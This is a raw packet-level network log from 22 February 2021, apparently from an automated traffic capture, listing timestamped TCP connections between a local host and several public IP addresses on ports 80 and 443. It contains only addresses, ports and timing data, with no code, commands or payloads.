                                                                                                                                                Feb 22, 2021 23:45:42.823780060 CET49967443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:42.928540945 CET8049959192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:42.928653002 CET4995980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:42.930217028 CET8049968192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:42.930413961 CET4996880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:42.930828094 CET4996880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:43.100332975 CET8049968192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.100358009 CET8049968192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.100828886 CET4996880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:43.103420973 CET49960443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.104638100 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.145646095 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.145998955 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.146951914 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.149224043 CET44349960216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.151391983 CET44349960216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.151570082 CET49960443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.187923908 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.197617054 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.197686911 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.197722912 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.197751045 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.197778940 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.197789907 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.204663992 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.251929998 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.254385948 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.254483938 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.255485058 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.302928925 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.456712961 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.456769943 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.456828117 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.456855059 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.456859112 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.456887007 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.456890106 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.456937075 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:43.664619923 CET4996180192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.666062117 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.720968962 CET8049961104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.721107960 CET4996180192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.722542048 CET8049970104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.722702026 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.723304987 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.780967951 CET8049970104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.892555952 CET8049970104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.892796040 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.897315979 CET49962443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.953757048 CET44349962104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.953788042 CET44349962104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.953912020 CET49962443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:43.953984976 CET49962443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.060997009 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.117351055 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.117578983 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.118182898 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.176445007 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.176623106 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.177031040 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.179094076 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.189156055 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.235435009 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.245433092 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.353776932 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.357666969 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:44.363760948 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.421411991 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.421593904 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.422463894 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.478714943 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.478740931 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.478827953 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.479523897 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.485961914 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.535691977 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.542119980 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668248892 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668287039 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668308020 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668571949 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.668872118 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668910980 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.668934107 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.669004917 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.669015884 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.669090033 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.669104099 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.669126034 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.669184923 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.669260979 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.669466019 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.669516087 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.673808098 CET4996480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:44.676215887 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:44.724859953 CET8049973172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.725152969 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:44.726264000 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:44.727159023 CET44349972104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.727303982 CET49972443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:45:44.736905098 CET8049964172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:44.737060070 CET4996480192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:44.774575949 CET8049973172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.150612116 CET8049973172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.150788069 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.158440113 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.220093966 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.220204115 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.220947981 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.282612085 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.286250114 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.286459923 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.287786007 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.298564911 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.351844072 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.363744020 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928841114 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928874016 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928893089 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928917885 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928942919 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928972006 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.928992033 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.929002047 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.929027081 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.929101944 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.929114103 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.929120064 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.930205107 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.930259943 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.970446110 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.970479965 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.970505953 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.970531940 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.970546961 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.970627069 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.970638037 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.970643997 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.971829891 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.971937895 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.972058058 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.972074986 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.972189903 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.972212076 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.972856045 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.972886086 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.972973108 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.973000050 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.975519896 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.975552082 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.975577116 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.975600958 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.975650072 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.975676060 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.975682020 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.975686073 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.977746964 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.977780104 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.977838993 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.977861881 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.979093075 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.979125023 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.979207039 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.979227066 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.979811907 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.979840994 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.979911089 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.979931116 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.981409073 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.981441021 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.981473923 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.981520891 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.983213902 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.983242035 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.983292103 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.985790968 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.991219997 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.991244078 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.991286039 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.991302967 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.991339922 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.991422892 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.992712021 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.992727041 CET44349974172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:45.992851019 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:45.992878914 CET49974443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:46.233027935 CET4996680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.234059095 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.304186106 CET80499755.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.304327965 CET80499665.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.304366112 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.304460049 CET4996680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.305159092 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.373529911 CET80499755.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.373723984 CET80499755.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.374221087 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.375684977 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.448605061 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.448755026 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.449215889 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.520257950 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.520287991 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.521872044 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.522423029 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.525264025 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.596366882 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.936562061 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:46.936876059 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:46.936970949 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:46.937200069 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:46.937274933 CET4996880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:46.957834959 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957868099 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957891941 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957923889 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957942963 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957964897 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.957983971 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.958024025 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.958055019 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.958391905 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:46.983040094 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.983776093 CET8049973172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.984874010 CET44349969216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.985239983 CET4997380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:46.985263109 CET49969443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:46.993262053 CET8049970104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.993302107 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.993329048 CET44349971104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.993490934 CET4997080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:46.993511915 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:46.993529081 CET49971443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:47.031637907 CET443499765.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.035984993 CET49976443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:47.105933905 CET8049968192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.107953072 CET4996880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:47.471256971 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:47.641894102 CET8049978192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.642119884 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:47.642577887 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:47.812056065 CET8049978192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.812096119 CET8049978192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.814596891 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:47.887130976 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:47.928102970 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.928320885 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:47.929452896 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:47.970447063 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.982892990 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.982942104 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.982975006 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.983050108 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:47.983153105 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:47.997252941 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:48.043343067 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.045799017 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.045909882 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:48.046947002 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:48.094346046 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.241440058 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.241461039 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.241473913 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.241482973 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.241594076 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:48.241692066 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:48.490086079 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.546799898 CET8049980104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.547008991 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.548012018 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.605259895 CET8049980104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.711705923 CET8049980104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.711888075 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.714425087 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.772480965 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.774425983 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.775048018 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.831319094 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.831374884 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.831598043 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.832253933 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.838516951 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:48.889344931 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.896399975 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.010108948 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.012876034 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:49.070064068 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.126619101 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.126758099 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.127501965 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.183753967 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.184344053 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.184447050 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.185287952 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.194986105 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.241687059 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.251323938 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377044916 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377068043 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377093077 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377101898 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377114058 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377142906 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377152920 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377182007 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.377252102 CET44349982104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.377262115 CET44349982104.244.42.6192.168.2.6
